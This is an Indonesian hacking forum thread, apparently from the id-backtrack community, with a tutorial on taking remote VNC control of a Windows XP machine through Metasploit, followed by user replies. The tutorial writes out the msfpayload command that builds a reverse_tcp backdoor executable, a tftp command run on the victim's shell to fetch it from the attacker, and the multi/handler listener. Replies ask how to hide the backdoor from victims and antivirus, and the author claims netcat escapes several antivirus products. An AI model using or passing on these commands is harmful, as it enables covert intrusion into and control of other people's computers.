[zee eichel]

Sebelum kita membahasa tentang tehnik mendapatkan akses remote vlc via metasploit … sebaiknya teman-teman membaca ini postingan ini terlebih dahulu [.. http://forum.id-backtrack.com/showthread.php?tid=110 .. ] karena postingan ini merupakan sambungan dari postingan tersebut.

Seperti pada postingan saya yang lalu mengenai remote windows dengan backdoor.exe kita sudah mendapatkan akses shell komputer target… Jadi anggapan saya anda telah berhasil pada tutorial saya yang pertama dan telah mendapatkan akses shell target dengan mengunakan NC ( netcat ) dalam hal ini saya spesifisikan sebagai berikut :

Code:

komputer penyerang

- ip addr : 192.168.1.34
- os : backtrack R2

komputer target

- ip addr : 192.168.1.33
- os windows xp sp2

Diakesnya shell via netcat akan membuka kita untuk mengakses komputer korban



Langkah berikutnya kita harus membuat backdoor lagi .. hahaha maap ya.. kebanyakan bikin backdoor deh . Kalo pada tutorial sebelumnya kita membuat backdoor.exe yang di sisipi netcat kali ini kita buat backdoor via metasploit untuk membuka akses reverse_tcp yang nantinya akan membuat koneksi vnc …okey ..

ikuti langkah-langkah berikut ini

Code:

root@IBTeam:~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.34 LPORT=2482 x > /tmp/zee-ganteng.exe

ket : windows/vncinject/reverse_tcp —- payload yang di gunakan
LHOST = isikan ip anda
LPORT = isikan port yang memungkinkan ..
/tmp = direktori di mana kita akan mengesave backdoor …
mengapa di /tmp ? .. ya karena kita akan menggunakan fasilitas tftp ( default directory tftpd )
zee-ganteng.exe — nama backdoor , bisa gunakan nama sesuai kreasi ente

backdoor sudah tercipta



Seep tahap persiapan telah anda lewati .. sekarang mari kita exploitasi lebih lanjut.. . Pindahkan file backdoor yang barusan kita buat tadi ( zee-ganteng.exe ) ke komputer target . Dengan ap ? ya dengan TFTPD service .

aktifkan dengan

menu —–>  service —–> TFTPD —–> TFTPD —–> start TFTPD



Sekarang anda mengerti kenapa saya memilih directory /tmp untuk mensave backdoor .. ya karena home directory TFTPD secara default berada di sana… Lanjut kang

Untuk memindahkan backdoor tersebut bukanlah hal yang sulit ..

Pada shell windows tadi ketikan perintah :

Code:

tftp -i 192.168.1.34 GET /tmp/zee-ganteng.exe

Ok udah sukses perjalanan kita sampai di sini hehehe… sudah saatnya kita action sekarang … buka kembali shell pada tab baru .. masuk ke metasploit

Code:

root@IBTeam~# cd /pentest/exploits/framework3
root@IBTeam:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.34 RPORT=2428 DisabledCourtesySHell=true Ewindows/vncinject/reverse_tcpwindows/vncinject/reverse_tcp

Nah tinggal kita jalankan saja file backdoor reverse_tcp tadi



Perintah agar runnig hanya dengan menuliskan file yang hendak di esekusi terus enter.. perhatikan gambar di atas.

Setelah backdoor tersebut berhasil di aktifkan … we have the vnc server active



Bagi temen2 yang kurang jelas dengna tutorial ini. Silahkan mendownload video tutorial yang udah ane buat … just for share.. long live open source

video link :

http://www.ziddu.com/download/14923691/vnc.rar.html

watch online :

http://blip.tv/file/5128068

sumber : http://zeestuff.wordpress.com/2011/05/12...pi-target/

[lucifer893$]

permisi bang mau naya nih, tpi mav klo pertanyaan na anehh, msi newbi hehhe

kmren say nyobain remote window yg abng post bisa pi ad step yg gagal, pas pembuatan self install windows na sya sdikit bingung pas mau masukin packed file na dan install program sama post install commend na.. apkh nc na dimasukna pada install prgm atau file yg .vbs na.. kmren sya coba pas backdoor na mau dijalan ni kluar alert klo file .vbs na not found maupun sblik na... jdi kmren sya pake sistem paksa aja untuk jlni backdor na trus bisa dah remote windows na...
pi untuk post abng yg kedua tntang vnc remote sya sama skli ndak brhasil bang pas masuk ./msfcli trus code na sya tulis n djalni malah kta na module gak ada.. sya iseng nyobain lgi lwt ./msfconsole bisa tpi ttp aja vnc na gak ad... oia sblum nya sya jug udh coba ngatifin vnc server lwt menu services tapi hasil na ttp ndak bisa... mohon pencrahan na bang... n mav klo curhat na k pnjngan hahah

[zee eichel]

om paste di sini deh error pd console nya

[ivan_86]

kk ko di shell tulisan nya bisa warna ijo....pengen tuh kk gmn caranya
pleas pengguna baru

[THJC]

kk ko di shell tulisan nya bisa warna ijo....pengen tuh kk gmn caranya
pleas pengguna baru

kog.. rada OOT ya...
Mending PM aja om

[zee eichel]

pada terminal ada pilihan untuk ngeditnya.. bisa kok .. itu ane pake backtrack IV ...

[R-12]

pintu belakang yg dipasang pada windows orang bisa di rapikantidk ini masalah nya itu bisa dilhat di file c: apakah gk bisa di buat folder misal C:\windows\system32\.. atau apa gitu suapaya korban ini tidak curiga... kemarin pernnaah taaaaak coba habis digabungin dengan fail apagitu seperti flass kkaya contonya... nah backdornya lari ke C: nah gimana kalo antivirus korban lebih kkuat... langsung tuh dideteksi fail exenya treen gagal deh :pc::pc::pc:

[zee eichel]

netcat tidak pernah di anggap virus ama antivirus bro .. coba aja sedangkan vscript yang ane bikin itu cuma autorunning nc ... jadi antivirus tidak medeteksinya sebagai virus ..

tested :

= kapersky 2011 internet security
= smadav pro
= avg

[zallfaizall]

Remote vnc komputer target dengan paksa bisa dbuat pake bactrak 5 ngak..?kerna saya ngak bisa start tftpd pake backtrack 5

[zee eichel]

tftpd harus di install terlebih dahulu.. gunakan fasilitas synaptic search untuk memudahkan anda menemukan tftpd